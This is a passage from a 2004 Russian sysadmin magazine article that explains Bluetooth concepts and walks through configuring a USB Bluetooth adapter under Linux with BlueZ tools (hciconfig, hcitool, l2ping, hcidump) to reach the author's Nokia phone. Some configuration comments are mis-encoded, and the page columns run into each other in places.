что фирменный соединительный кабель, в отличие от ки-
тайских подделок, – штука дорогая, к тому же при смене
модели телефона кабель становится для меня совершенно
бесполезен. Поэтому пришлось перейти ко второму вари-
анту подключения – к использованию инфракрасной связи
IrDA (Infrared Direct Access). Благо соответствующий функ-
ционал был встроен и в телефон, и в ноутбук. Но и тут не
обошлось без недостатков. Во-первых, существует ограни-
чение по радиусу действия. Во-вторых, устойчивое взаи-
модействие устройств возможно только в зоне прямой ви-
димости, что не очень легко выполнить на рабочем столе,
заваленном книгами и распечатками. К тому же глазки IrDA-
излучателей должны быть направлены строго друг на дру-
га и при этом желательно, чтобы приборы не двигались.
Следовать этим требованиям, конечно, возможно, но уж
слишком неудобно себя чувствуешь, да и мобильность ка-
кая-то ненастоящая получается.
Немного подумав, я пришел к выводу, что самым луч-
шим выходом из сложившейся ситуации будет использова-
ние Bluetooth. Телефон был готов к такому применению, а
вот с ноутбуком вышла промашка. На его корпусе среди
20
АНДРЕЙ БЕШКОВ
прочих полезных сведений о комплектации виднелась над-
пись, поначалу внушившая надежду: «Поддержка Memory
Stick Slot и Bluetooth». А еще ниже мелким шрифтом зна-
чилось «опция», и, как всегда, эта загадочная дама со
странным именем обошла нас своей благосклонностью.
Итак, решено: будем покупать Bluetooth USB адаптер, в
англоязычной документации называемый Bluetooth USB
dongle, а в просторечии «синий свисток». В связи с тем,
что на ноутбуке установлены две операционные системы,
встает вопрос, какой именно адаптер покупать. С Windows
проблем, скорее всего, не будет, потому как большинство
производителей оборудования затачивает свои изделия
именно под эту ОС. А вот с Linux крепкой дружбы никто
не обещал. Список оборудования, которое удалось заста-
вить нормально работать под Linux, можно посмотреть тут:
http://www.holtmann.org/linux/bluetooth/devices.html. В на-
шем случае особое внимание стоит уделить разделу
«Bluetooth USB adapters». Проанализировав прочитанное,
пришел к выводу, что самой выгодной покупкой по соот-
ношению цена-качество будет адаптер BT009X, произво-
димый тайваньской фирмой Bluetake Technology. Куплен-
ное устройство выглядело изящно, миниатюрно и весило
примерно грамм 50. Не удержавшись, конечно разобрал
его, посмотрел, что внутри.

Удовлетворив любопытство, самое время вернуться к
предмету нашего разговора.
История появления Bluetooth
и механизмы его действия
Началось все примерно тысячу лет назад. В середине X века
Данией правил король – викинг Гарольд I по прозвищу Си-
ний зуб. Он провозгласил девиз «объединяйтесь все» и
собственноручно стал осуществлять его. Благодаря стара-
ниям короля множество разрозненных княжеств объедини-
лись в сильное государство, завладевшее к тому же час-
тью земель Швеции и Норвегии.
В 1994 году компания Ericsson задалась целью приду-
мать способ соединения различных устройств с помощью
беспроводной связи. К началу 1997 года разработки, веду-
щиеся внутри фирмы, начали приносить первые результа-
ты. Было принято решение о начале переговоров с осталь-
ными крупными производителями телекоммуникационно-
го оборудования. Весной 1998 года компании Intel, IBM,
Nokia, Ericsson и Toshiba объявили о начале совместных
работ по созданию универсального стандарта коммуника-
ций для бытовых устройств. В честь доблестного короля –
объединителя викингов стандарт решено было назвать
Bluetooth, а само содружество рабочих групп компаний по-
лучило обозначение Bluetooth Special Interest Group (BSIG).
Постепенно принять участие в начинании и присоединить-
ся к BSIG решили Lucent, Motorola, Sun Microsystems, 3Com,
Agere, Microsoft и многие другие производители разнород-
ного оборудования и программного обеспечения. На дан-
ный момент ассоциация разработчиков Bluetooth насчиты-
вает более двух тысяч компаний разного масштаба и не-
сколько десятков тысяч волонтеров, принимающих участие
в работе над проектом.
В сущности идея проекта довольно проста: необходимо
стандартизировать механизмы соединения всех видов со-
товых телефонов, компьютеров, наладонников, гарнитур
hands-free и прочего движимого и недвижимого оборудо-
вания. Добиться этого можно, если отделить механизмы
реализации связи между устройствами от самих устройств.
Пусть проблемами общения занимаются миниатюрные ра-
диоинтерфейсы, встроенные в каждый прибор. Они рабо-
тают на частоте 2,45 ГГц ISM (Industrial-Scientific-Medical).
В большинстве стран для вещания в этом диапазоне не тре-
буется дополнительного лицензирования. Исключением
являются Франция, Испания и Япония. Диапазон частот от
2,402 ГГц до 2,480 ГГц разбивается на 79 каналов разме-
ром в 1 МГц. Для уменьшения помех от внешних устройств
вроде СВЧ-печей и повышения безопасности 1600 раз в
секунду происходит псевдослучайный выбор одного из ка-
налов. Отправка данных происходит уже с новым значени-
ем базовой частоты, взятым из выбранного интервала. Та-
ким образом, получается, что приемник и передатчик синх-
ронно переключают каналы связи. В англоязычной литера-
туре это явление называется Frequency Hopping.
1
Находящиеся рядом устройства слушают эфир и периодически «засыпают», затем снова «просыпаются» и пыта-
ются найти соседей. Поэтому точно до миллисекунды сказать, когда произойдет соединение, не представляется
возможным.
№10(23), октябрь 2004
администрирование
На данный момент существуют два основных подвида
bluetooth-устройств. Отличаются они только дальностью
действия. Большинство имеют зону уверенного приема
сигнала радиусом в 10 метров. Хотя некоторые экземпля-
ры обладают усилителем сигнала и способны взаимодей-
ствовать друг с другом на расстоянии 100 метров при ус-
ловии, что все это будет происходить на открытой мест-
ности.
Еще одним интересным свойством такого способа об-
щения является возможность спонтанного1 объединения
нескольких bluetooth-устройств в своеобразную динами-
ческую локальную мини-сеть, называемую piconet. Давай-
те разберемся, как это реализовано на практике. Устрой-
ства, не присоединенные ни к одному piconet, находятся в
режиме Standby и каждые 1,28 секунды слушают эфир на
32 зарезервированных для этого частотах. Как только они
входят в зону устойчивой взаимной слышимости с другим
устройством, одно из устройств принимает на себя гла-
венствующую роль и начинает отсылать в эфир пакеты
Inquiry. После отправки 16 пакетов по одному на каждую
частоту наступает пауза, в течение которой должны прий-
ти ответы от подчиненных устройств. Если никто не ото-
звался, то проверяются оставшиеся 16 частот. Обнаруже-
ние активных устройств зависит от того, в каком режиме
они находятся:
! Non-discoverable – не отвечает на запросы о присоеди-
нении к piconet.
! Limited discoverable – в этом режиме находятся устрой-
ства, которые отвечают на запрос только в определен-
ное время или при соблюдении некоторых условий.
! Discoverable mode – отвечает на все полученные запро-
сы.
На самом деле все обстоит еще сложнее. Вдобавок для
того, чтобы присоединение к сети состоялось, устройство
должно работать в режиме connectable. Если же оно нахо-
дится в режиме non-connectable, то соседям, скорее всего,
удастся его обнаружить, но обмениваться данными с ним
будет невозможно.
В случае если все необходимые формальности соблю-
дены, устройство, инициировавшее обмен пакетами, ста-
новится ведущим (Master), а остальные принимают роль
ведомых (Slave). При необходимости любое из ведомых
устройств может запросить смену роли и стать мастером
взамен прежнего лидера. В момент присоединения к
piconet каждое Slave-устройство получает от мастера FHS-
пакет, в котором содержится Global_ID, используемый для
определения номера шаблона прыжков по частотному ди-
апазону и параметр clock, указывающий смещение внут-
ри этого самого шаблона. Войдя в piconet, ведомое уст-
ройство получает трехбитный адрес AMA (Active Member
Adress), тем самым показывая, что оно готово к общению
с соседями. Мастер-устройство всегда имеет адрес 0. С
помощью трех бит возможно адресовать не более восьми
устройств, таким образом, получается, что внутри piconet
21
 администрирование
будут одновременно разговаривать только мастер и се-
меро подчиненных. Из-за этого в русскоязычных статьях
о bluetooth укоренилось одно из распространенных заб-
луждений, гласящее, что в piconet не может быть более
восьми устройств. Давайте посмотрим, почему это не со-
ответствует действительности. При входе в piconet девя-
того устройства мастер принудительно переводит одного
из подчиненных в режим Park и отбирает у него адрес AMA,
выдавая взамен восьми-битный адрес PMA (Passive Member
Adress). Освободившийся AMA-адрес отдается вновь при-
бывшему. Припаркованные устройства продолжают пери-
одически прослушивать эфир в надежде услышать инфор-
мацию, адресованную им. В случае если устройство с PMA-
адресом хочет что-то сказать, ему приходится спросить
разрешения у мастера, получить отобранный у кого-то
другого AMA-адрес и только после этого начать переда-
вать данные. Комбинация из AMA- и PMA-адресов позво-
ляет иметь в одном piconet 256 устройств, из которых лишь Все базируется на радиочастотных каналах, о которых
8 активно передают данные. Для экономии энергии мастер мы говорили выше по тексту, RF (Radio Frequnce). Канала-
может перевести любое из подчиненных устройств в режи- ми управляет аппаратура Baseband. Выше находится Link
мы Hold или Sniff, тем самым говоря: «Просыпайся каждые Manager, реализующий протокол LMP (Link Manager Protocol).
n интервалов». Разница между ними состоит в том, что в В его задачи входит управление каналом и реализация про-
режиме Hold устройство должно молчать между пробужде- цедур безопасности на физическом уровне. Следующим в
ниями, а в режиме Sniff в случае необходимости оно может иерархии числится L2CAP (Logical Link Control and Adaptation
передавать данные. В то же время само управляемое уст- Layer Protocol). Он является базовым транспортным прото-
ройство может запросить перевод в любой из вышеупомя- колом передачи данных. Большинство вышестоящих про-
нутых режимов. токолов пользуются его услугами для приема и отправки
Мини-сети легко могут сообщаться между собой через пакетов. Основные свойства L2CAP, на которые стоит об-
устройства, находящиеся в зоне действия двух и более се- ратить внимание:
тей. Таким образом, они объединяются в структуры, назы- ! Protocol Multiplexing – позволяет определить, кому из про-
ваемые Scatternet. Стоит отметить тот факт, что устройство токолов верхнего уровня предназначены те или иные
может быть мастером лишь в одном piconet, но это не ме- пакеты.
шает ему входить в другой piconet в роли подчиненного. ! Segmentation and Reassembly – максимальный размер
Примерную схему Scatternet, состоящую из трех piconet, пакета L2CAP установлен в 64 кб, а Baseband опериру-
можно увидеть на следующем рисунке. ет пакетами размером в 341 байт. Поэтому L2CAP от-
правителя обязан создавать из больших пакетов пос-
ледовательность мелких, а получатель в свою очередь
должен склеивать их по мере поступления.
! QOS – позволяет гарантировать, что ширина полосы и
временные задержки для важного трафика не достиг-
нут критических пределов.

Перейдем к протоколам верхнего уровня. Думаю, с TCP/IP

все ясно. Протокол HID реализует взаимодействие с уст-
ройствами Human Interface Design. К устройствам такого
типа принадлежат модификации клавиатур, мышей и про-
чего оборудования, с которым напрямую взаимодействую-
ет человек. RFCOMM эмулирует соединение точка-точка че-
рез интерфейс стандартного последовательного COM-пор-
та, передавая данные поверх L2CAP. Следующим интерес-
ным для нас протоколом является SDP (Service Discovery
Protocol). В его обязанности входит выполнение следующих
действий:
! Поиск и выбор сервисов, предоставляемых другими ус-
тройствами по специальным критериям.
! Поиск сервисов по классам. К примеру, если нам нужно
Разобравшись с тем, как строятся взаимоотношения найти устройство, предоставляющее сервис Dial-up
bluetooth-устройств на самом нижнем уровне, давайте по- networking, то поиск должен вернуть нам имена только
смотрим, как реализован стек протоколов. тех устройств, внутри которых есть модем.

22

! Поддерживать базу данных доступных служб в актуаль-
ном состоянии.
Еще одним объектом, заслуживающим нашего внимания
является HCI (Host Controller Interface). Он представляет со-
бой командный интерфейс к контроллеру baseband и слою,
реализующему Link Manager. С его помощью можно узна-
вать и изменять состояние контрольных регистров bluetooth-
устройств. Закончив с протоколами верхнего уровня, хоте-
лось бы поговорить о службе audio, часто называемой
bluetooth voice. С ее помощью могут одновременно переда-
ваться три голосовых потока. Характеристики каждого из них
определяются приложением, передающим данные. Макси-
мальное возможное качество звука достигается при часто-
те дискретизации в 48 кГц. На схеме от компонента audio
не зря исходят две стрелки. Дело в том, что звук может пе-
редаваться либо напрямую через Baseband, либо, как и все
остальные данные, через L2CAP. Конечно, в случае пере-
дачи голоса через L2CAP устройство получает меньше воз-
можностей управлять голосовым трафиком, но такой под-
ход позволяет легко стыковать bluetooth- и не bluetooth-сети.
Плюс ко всему появляется возможность шифровать голо-
совой трафик алгоритмами повышенной стойкости.
Раз уж зашел разговор о шифровании, стоит погово-
рить о системе безопасности, применяемой в устройствах
bluetooth. Технология защиты данных изначально встроена
в протокол. В зависимости от ценности передаваемых дан-
ных можно применять один из трех режимов безопасности.
! Security mode 1 (non secure) – устройство не иницииру-
ет никаких защитных процедур и полностью открыто для
общения.
! Security mode 2 (service level enforced security) – защит-
ные процедуры выполняются только после установле-
ния и настройки параметров соединения. Требования
безопасности в данном случае определяют службы, пе-
редающие трафик.
! Security mode 3 (link level enforced security) – защита ини-
циализируется в процессе установления и настройки со-
единения. В случае если второе устройство не может
выполнить требования безопасности, соединение бес-
прекословно разрывается.
Стоит обратить внимание на то, что второй и третий
режимы можно комбинировать, обеспечивая повышенную
безопасность соединения. Получается, что сначала уста-
навливается защищенное соединение, а затем данные,
передаваемые по нему, шифруются в соответствии с тре-
бованиями сервисов отправителя и получателя.
Краеугольным камнем системы безопасности bluetooth
является сеансный ключ. Он создается в момент соедине-
ния и впоследствии используется для шифрования и иден-
тификации всего передаваемого трафика. Впрочем, никто
не мешает дополнительно шифровать трафик на уровне
приложений.
Несмотря на попытку рассказывать только о ключевых
моментах, оставляя несущественные подробности за бор-
том, я, признаться, немного устал излагать теорию работы
bluetooth. Посему предлагаю сейчас же перейти к практи-
ческому применению полученных знаний.
№10(23), октябрь 2004
администрирование
Bluetooth + Linux на практике
Чтобы система смогла увидеть наше usb bluetooth-устрой-
ство, первым делом убеждаемся, что мы работаем на дос-
таточно свежем ядре. У меня используется ALT Linux, вер-
сия ядра 2.4.26-std-up-alt6. Давайте посмотрим, какой тип
контроллера USB у нас установлен.
# lspci
00:00.0 Host bridge: Intel Corp. 82845 845 (Brookdale)
Chipset Host Bridge (rev 04)
00:01.0 PCI bridge: Intel Corp. 82845 845 (Brookdale)
Chipset AGP Bridge (rev 04)
00:1d.0 USB Controller: Intel Corp. 82801DB (ICH4) USB UHCI #1 (rev 03)
00:1d.1 USB Controller: Intel Corp. 82801DB (ICH4) USB UHCI #2 (rev 03)
00:1d.2 USB Controller: Intel Corp. 82801DB (ICH4) USB UHCI #3 (rev 03)
00:1d.7 USB Controller: Intel Corp. 82801DB (ICH4)
USB2 EHCI Controller (rev 03)
00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 83)
00:1f.0 ISA bridge: Intel Corp. 82801DBM LPC Interface Controller (rev 03)
00:1f.1 IDE interface: Intel Corp. 82801DBM (ICH4)
Ultra ATA Storage Controller (rev 03)
00:1f.3 SMBus: Intel Corp. 82801DB/DBM (ICH4)
SMBus Controller (rev 03)
00:1f.5 Multimedia audio controller: Intel Corp. 82801DB (ICH4)
AC'97 Audio Controller (rev 03)
00:1f.6 Modem: Intel Corp. 82801DB (ICH4)
AC'97 Modem Controller (rev 03)
01:00.0 VGA compatible controller: ATI Technologies Inc
Radeon R250 Lf [Radeon Mobility 9000 M9] (rev 02)
02:03.0 CardBus bridge: Ricoh Co Ltd RL5c475 (rev b8)
02:03.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C551 IEEE 1394 Controller
02:07.0 CardBus bridge: Texas Instruments PCI1410
PC card Cardbus Controller (rev 01)
02:08.0 Ethernet controller: Intel Corp. 82801BD PRO/100 VE (LOM)
Ethernet Controller (rev 83)
Судя по выводу, у нас есть UHCI- и EHCI-контроллеры
USB. Проверяем, что написано про USB в /etc/modules, сре-
ди всего прочего там должны быть строки:
usbcore
usb-uhci
А в файле /etc/modules.conf нужно найти следующее
сочетание символов:
alias usb-interface usb-uhci
Теперь необходимо убедиться в том, что все модули,
необходимые для поддержки USB, загружены в память.
lsmod | grep usb
hci_usb 8600 1
usb-storage 139744 0
usb-uhci 21676 0 (unused)
usbcore 58464 1 [hci_usb ehci-hcd usb-storage usb-uhci]
scsi_mod 95296 5 [sg sr_mod sd_mod usb-storage ide-scsi]
Если это не так, то следует перезагрузить систему, что-
бы загрузка нужных модулей прошла автоматически на ос-
нове содержимого файлов /etc/modules и /etc/modules.conf,
либо загрузить модули вручную с помощью команды insmod.
Подробнее почитать о реализации USB в Linux можно в
статье Виктора Костромина http://vikos.lrn.ru//kos.php?name=
papers/usb/USB-Lin.html и, конечно же, на сайте www.linux-
usb.org.
Тут нужно сделать маленькое отступление. Дело в том,
на свете существует несколько реализаций стека протоко-
лов bluetooth. Самые распространенные из них – это OpenBT,
первоначально созданный фирмой Axis: http://developer.
axis.com/software/bluetooth и Bluez – детище Qualcom http://
23
 администрирование
bluez.sourceforge.net. Оба поставляются вместе с исходни-
ками. Некоторое время назад безусловным лидером являл-
ся OpenBT, потому что его реализация на тот момент была
надежнее и проще. Да и возможности работы с BCSP были
весьма мощные. Но по мере дозревания Bluez стал дого-
нять, а затем и превзошел OpenBT по всем показателям.
Отдельного упоминания стоит удобство и гибкость исполь-
зования PAN (Personal Area Network). К тому же Bluez по-
зволяет легко работать с протоколом OBEX поверх RFCOMM.
В деле популяризации Bluez не последнюю роль сыграл тот
факт, что он по умолчанию включен во все новые ядра Linux.
К тому же алгоритмы работы с RFCOMM у Bluez оказались
написаны на редкость удачно, что позволило создавать
весьма гибкие решения.
Также стоит упомянуть, что в природе существуют про-
граммные комплексы BlueDrekar от IBM: http://www.alpha
Works.ibm.com/tech/bluedrekar и Affix от Nokia http://affix.
sourceforge.net/. Внутри первого из них встроена полноцен-
ная реализация bluetooth, но, к сожалению, исходных тек-
стов этого продукта никто не видел. А вот вторая разра-
ботка, изначально развивавшаяся под эгидой компании
Nokia, на данный момент является типичным OpenSource.
Приняв во внимание все вышеизложенные факты, де-
лаем однозначный вывод. Для работы с нашими bluetooth-
устройствами удобнее всего будет использовать Bluez.
Настало время установить пакеты, необходимые для
работы bluetooth.
# apt-get install libbluez libbluez-devel ↵
bluez-hciemu bluez-hcidump bluez-utils
Смотрим, что добавилось в /etc/modules.conf:
alias net-pf-31 bluez
alias bt-proto-0 l2cap
alias bt-proto-2 sco
Перезагружаем машину, чтобы проверить, как автома-
тически загружаются модули bluez. Конечно, можно было
загрузить их вручную с помощью modprobe и imsmod, но
мне больше нравится, чтобы все делалось автоматически.
После окончания загрузки системы проверяем, как себя
чувствует модуль bluez.
# lsmod | grep bluez
bluez 30116 1 [hci_usb]
Затем вставляем bluetooth-адаптер в разъем USB. В
файле /var/log/messages и на двенадцатой консоли должны
появиться следующие сообщения:
Sep 28 21:23:19 tiger kernel: hub.c: new USB device 00:1d.0-1,
assigned address 2
Sep 28 21:23:24 tiger kernel: BlueZ Core ver 2.3
Copyright (C) 2000,2001 Qualcomm Inc
Sep 28 21:23:24 tiger kernel: Written 2000,2001
by Maxim Krasnyansky <maxk@qualcomm.com>
Sep 28 21:23:24 tiger kernel: BlueZ HCI USB driver ver 2.5
Copyright (C) 2000,2001 Qualcomm Inc
Sep 28 21:23:24 tiger kernel: Written 2000,2001
by Maxim Krasnyansky <maxk@qualcomm.com>
Sep 28 21:23:24 tiger kernel: usb.c: registered new driver hci_usb
2
Подробнее о типах пакетов можно прочитать здесь: http://www.winlab.rutgers.edu/~pravin/publications/papers/Mobicom-
handout.pdf и http://www.cs.ucla.edu/NRL/wireless/uploads/04_ICC_APT.pdf.
24
Стоит отметить, что каждое bluetooth-устройство имеет
уникальный шестизначный адрес, в дальнейшем называе-
мый BD (Bluetooth Device)-адрес. Больше все это похоже на
MAC-адреса обычных сетевых карт.
Проверяем, как система видит наш USB-адаптер.
# hciconfig -a
hci0: Type: USB
BD Address: 00:00:00:00:00:00 ACL MTU: 0:0 SCO MTU: 0:0
DOWN
RX bytes:0 acl:0 sco:0 events:0 errors:0
TX bytes:0 acl:0 sco:0 commands:0 errors:0
Features: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DH1 HV1
Link policy:
Link mode: SLAVE ACCEPT
Надпись «DOWN» и BD-адрес, полный нолей, говорят о
том, что в системе не запущен демон hcid (Bluetooth Host
Controller Interface Daemon). Поведение демона определя-
ется настройками, обычно находящимися в файле /etc/
bluetooth/hcid.conf. Давайте посмотрим, как выглядит содер-
жимое этого файла, и разберемся, что именно означает
каждая опция. Файл /etc/bluetooth/hcid.conf:
options {
# Àâòîìàòè÷åñêè èíèöèàëèçèðîâàòü íîâûå óñòðîéñòâà
#
autoinit yes;
# Íàñòðîéêè ìåíåäæåðà áåçîïàñíîñòè:
# none – ìåíåäæåð îòêëþ÷åí;
# auto – ïðè ïîëó÷åíèè âõîäÿùåãî ñîåäèíåíèÿ çàïðàøèâàòü
# PIN-êîä;
# user – çàïðàøèâàòü PIN-êîä âñåõ ñîåäèíåíèé
# áåç èñêëþ÷åíèÿ
#
security auto;
# Íàñòðîéêè ñîåäèíåíèÿ â ïàðó:
# none – ñîåäèíåíèå îòêëþ÷åíî;
# multi – ðàçðåøåíèå ñîçäàâàòü ïàðó ñ òåìè óñòðîéñòâàìè,
# êîòîðûå óæå ñîñòîÿò â äðóãèõ ïàðàõ;
# once – ïðîèçâîäèòü ïîïûòêó ñîåäèíåíèÿ òîëüêî îäèí ðàç
#
pairing multi;
# Ïðîãðàììà, ïðèíèìàþùàÿ PIN-êîä îò ïîëüçîâàòåëÿ è
# ïåðåäàþùàÿ åãî óäàëåííîìó bluetooth-óñòðîéñòâó,
# îáû÷íî íàçûâàåòñÿ pin_helper.
#
pin_helper /usr/bin/bluepin;
# Èìÿ ïðîãðàììû, âûäàþùåé PIN äëÿ ðåæèìà D-Bus,
# êàê âèäèòå, â íàøåì ñëó÷àå îíà íå èñïîëüçóåòñÿ
#
#dbus_pin_helper;
}
# Íàñòðîéêè ïî óìîë÷àíèþ äëÿ âñåõ HCI-óñòðîéñòâ
device {
# Èìÿ ëîêàëüíîãî bluetooth-óñòðîéñòâà â ïðèíöèïå ìîæåò
# áûòü ëþáûì, õîòÿ, êîíå÷íî, ëó÷øå âïèñàòü ÷òî-òî
# îñìûñëåííîå.  êà÷åñòâå íåîáÿçàòåëüíîãî äîïîëíåíèÿ
# ìîæíî âïèñàòü â òåêñò èìåíè ñèìâîëû ïîäñòàíîâêè.
# %d – id óñòðîéñòâà
# %h – èìÿ õîñòà
# Íàïðèìåð, òàêàÿ çàïèñü name "Bluetooth (%h)" â ìîåé
# ñèñòåìå ñîçäàñò èìÿ óñòðîéñòâà «Bluetooth tiger».
#  ñëó÷àå åñëè èìÿ õîñòà ñëèøêîì äëèííîå, ïîäñòàíîâêà
# ìîæåò íå ïðîèçâîäèòüñÿ. Ñîîòâåòñòâåííî, ïîëó÷èì ïðîñòî
# «Bluetooth».
#
name "tigroid";
# Êëàññ ëîêàëüíîãî óñòðîéñòâà.
# 0x100 îáîçíà÷àåò êîìïüþòåð.
 администрирование
# Указанием на то, что телефон включил bluetooth, мож-
class 0x100; но считать появление в верхнем левом углу дисплея знач-
# Òèï ïàêåòîâ ïî óìîë÷àíèþ. ка, изображающего радиоволны.
# Îáû÷íî ðàçðåøåíû âñå âîçìîæíûå òèïû2. С помощью утилиты hcitool начинаем сканирование ок-
# DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
#pkt_type DH1, DM1, HV1; ружающего пространства.
# Ðàçðåøåíèå íà ñêàíèðîâàíèå óñòðîéñòâ ìåòîäàìè Inquiry # hcitool scan
# è Page Scanning ...
# 00:02:EE:B6:6A:E5 Nokia 6310i
iscan enable;
pscan enable; Наш телефон благополучно нашелся. Теперь мы знаем,
# Ðåæèì ñîåäèíåíèÿ ïî óìîë÷àíèþ
что его BD-адрес 00:02:EE:B6:6A:E5. В дальнейшем мы будем
# none – íå èñïîëüçîâàòü íèêàêèõ ïîëèòèê äëÿ ñîåäèíåíèÿ обращаться к нему именно по этому адресу. Проверим, на-
# accept – âñåãäà ïðèíèìàòü âõîäÿùèå ñîåäèíåíèÿ сколько надежно работает передача пакетов между двумя
# master – áðàòü íà ñåáÿ ðîëü âåäóùåãî óñòðîéñòâà ïðè
# ïîëó÷åíèè âõîäÿùåãî ñîåäèíåíèÿ, è çàïðåùàòü ñìåíó устройствами. Для этого воспользуемся программой l2ping.
# ðîëåé äëÿ èñõîäÿùèõ ñîåäèíåíèé.
# # l2ping 00:02:EE:B6:6A:E5
lm accept, master; Ping: 00:02:EE:B6:6A:E5 from 00:0A:3A:53:36:41 (data size 20) ...
0 bytes from 00:02:EE:B6:6A:E5 id 200 time 31.69ms
# Ïîëèòèêà ñîåäèíåíèÿ ïî óìîë÷àíèþ 0 bytes from 00:02:EE:B6:6A:E5 id 201 time 39.49ms
# none – íå èñïîëüçîâàòü íèêàêèõ ïîëèòèê äëÿ ñîåäèíåíèÿ 0 bytes from 00:02:EE:B6:6A:E5 id 202 time 30.31ms
# rswitch – ðàçðåøèòü ñìåíó ðîëåé
0 bytes from 00:02:EE:B6:6A:E5 id 203 time 34.12ms
# hold – ðàçðåøèòü ðåæèì hold
# sniff – ðàçðåøèòü ðåæèì sniff 4 sent, 4 received, 0% loss
# park – ðàçðåøèòü ïàðêîâêó Теперь посмотрим дополнительную информацию об уда-
#
lp rswitch, hold, sniff, park; ленном устройстве.
# Àóòåíòèôèêàöèÿ è øèôðîâàíèå # hcitool info 00:02:EE:B6:6A:E5
auth enable; Requesting information ...
encrypt enable; BD Address: 00:02:EE:B6:6A:E5
} Device Name: Nokia 6310i
LMP Version: 1.1 (0x1) LMP Subversion: 0x22c
Закончив изучение настроек, запускаем демон hcid и Manufacturer: Nokia Mobile Phones (1)
Features: 0xbf 0x28 0x21 0x00 0x00 0x00 0x00 0x00
смотрим, как изменились характеристики USB bluetooth- <3-slot packets> <5-slot packets> <encryption> <slot offset>
адаптера. <timing accuracy> <role switch> <sniff mode> <SCO link>
<HV3 packets> <CVSD>Õ
# hcid
# hciconfig -a
В комплект программ, предназначенных для работы с
hci0: Type: USB HCI, входит еще одна полезная программа, hcidump. Думаю,
BD Address: 00:0A:3A:53:36:41 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN ISCAN AUTH ENCRYPT
по ее названию вы смогли догадаться, что перед нами ути-
RX bytes:2947 acl:80 sco:0 events:149 errors:0 лита для прослушивания трафика, проходящего через HCI-
TX bytes:2610 acl:59 sco:0 commands:61 errors:0 интерфейсы. Эта программа становится особенно полез-
Features: 0xff 0xff 0x0b 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3 ной в ситуациях, когда не удается подружить два bluetooth-
Link policy: RSWITCH устройства. К примеру, давайте посмотрим, какие данные
Link mode: SLAVE ACCEPT
Name: 'tigroid' проходят через используемый нами интерфейс hci0 во вре-
Class: 0x000100 мя выполнения команды hcitool info. Для этого на одной кон-
Service Classes: Unspecified
Device Class: Computer, Uncategorized соли запускаем hcidump, а на второй снова выполняем ко-
HCI Ver: 1.1 (0x1) HCI Rev: 0x20d LMP Ver: 1.1 (0x1) LMP Subver: 0x20d манду hcitool info.
Manufacturer: Cambridge Silicon Radio (10)

Судя по выводу, все идет как надо. Локальное bluetooth-
устройство получило BD-адрес 00:0A:3A:53:36:41. Давайте
теперь поищем удаленные bluetooth-устройства. Для этого
включаем bluetooth на телефоне.
# hcidump –i hci0 -X
HCIDump - HCI packet analyzer ver 1.12
device: hci0 snap_len: 1028 filter: 0xffffffff
> HCI Event: Command Status (0x0f) plen 4
0000: 00 01 05 04 ....
> HCI Event: Command Complete (0x0e) plen 10
0000: 01 0b 04 00 e5 6a b6 ee 02 00 .....j....
> HCI Event: Connect Complete (0x03) plen 11
0000: 00 29 00 e5 6a b6 ee 02 00 01 01 .)..j......
> HCI Event: Command Complete (0x0e) plen 6
0000: 01 0d 08 00 29 00 ....).
> HCI Event: Command Status (0x0f) plen 4
0000: 00 01 19 04 ....
> HCI Event: Remote Name Req Complete (0x07) plen 255
0000: 00 e5 6a b6 ee 02 00 4e 6f 6b 69 61 20 36 33 31 ..j....Nokia 631
0010: 30 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0i..............
0020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

№10(23), октябрь 2004 25

 администрирование
00b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ Service Class ID List:
00c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ "Headset Audio Gateway" (0x1112)
00d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ "Generic Audio" (0x1203)
00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ Protocol Descriptor List:
00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............... "L2CAP" (0x0100)
> HCI Event: Command Status (0x0f) plen 4 "RFCOMM" (0x0003)
0000: 00 01 1d 04 .... Channel: 12
> HCI Event: Read Remote Ver Info Complete (0x0c) plen 8 Language Base Attr List:
0000: 00 29 00 01 01 00 2c 02 .)....,. code_ISO639: 0x656e
> HCI Event: Command Status (0x0f) plen 4 encoding: 0x6a
0000: 00 01 1b 04 .... base_offset: 0x100
> HCI Event: Read Remote Supported Features (0x0b) plen 11 Profile Descriptor List:
0000: 00 29 00 bf 28 21 00 00 00 00 00 .)..(!..... "Headset" (0x1108)
> HCI Event: Command Status (0x0f) plen 4 Version: 0x0100
0000: 00 01 06 04 ....
> HCI Event: Disconn Complete (0x05) plen 4 Service Name: COM 1
0000: 00 29 00 16 .).. Service RecHandle: 0x10021
> HCI Event: Command Status (0x0f) plen 4 Service Class ID List:
> HCI Event: Read Remote Supported Features (0x0b) plen 11 "Serial Port" (0x1101)
> HCI Event: Command Status (0x0f) plen 4 Protocol Descriptor List:
> HCI Event: Disconn Complete (0x05) plen 4 "L2CAP" (0x0100)
"RFCOMM" (0x0003)
С помощью ключа –i можно указать, какой именно ин- Channel: 3
Language Base Attr List:
терфейс нужно прослушивать. В нашем случае это hci0. code_ISO639: 0x656e
Делать это необходимо только в системах с двумя и более encoding: 0x6a
base_offset: 0x100
hci-интерфейсами. В противном случае hcidump будет про-
слушивать первый по порядку интерфейс. Service Name: Voice Gateway
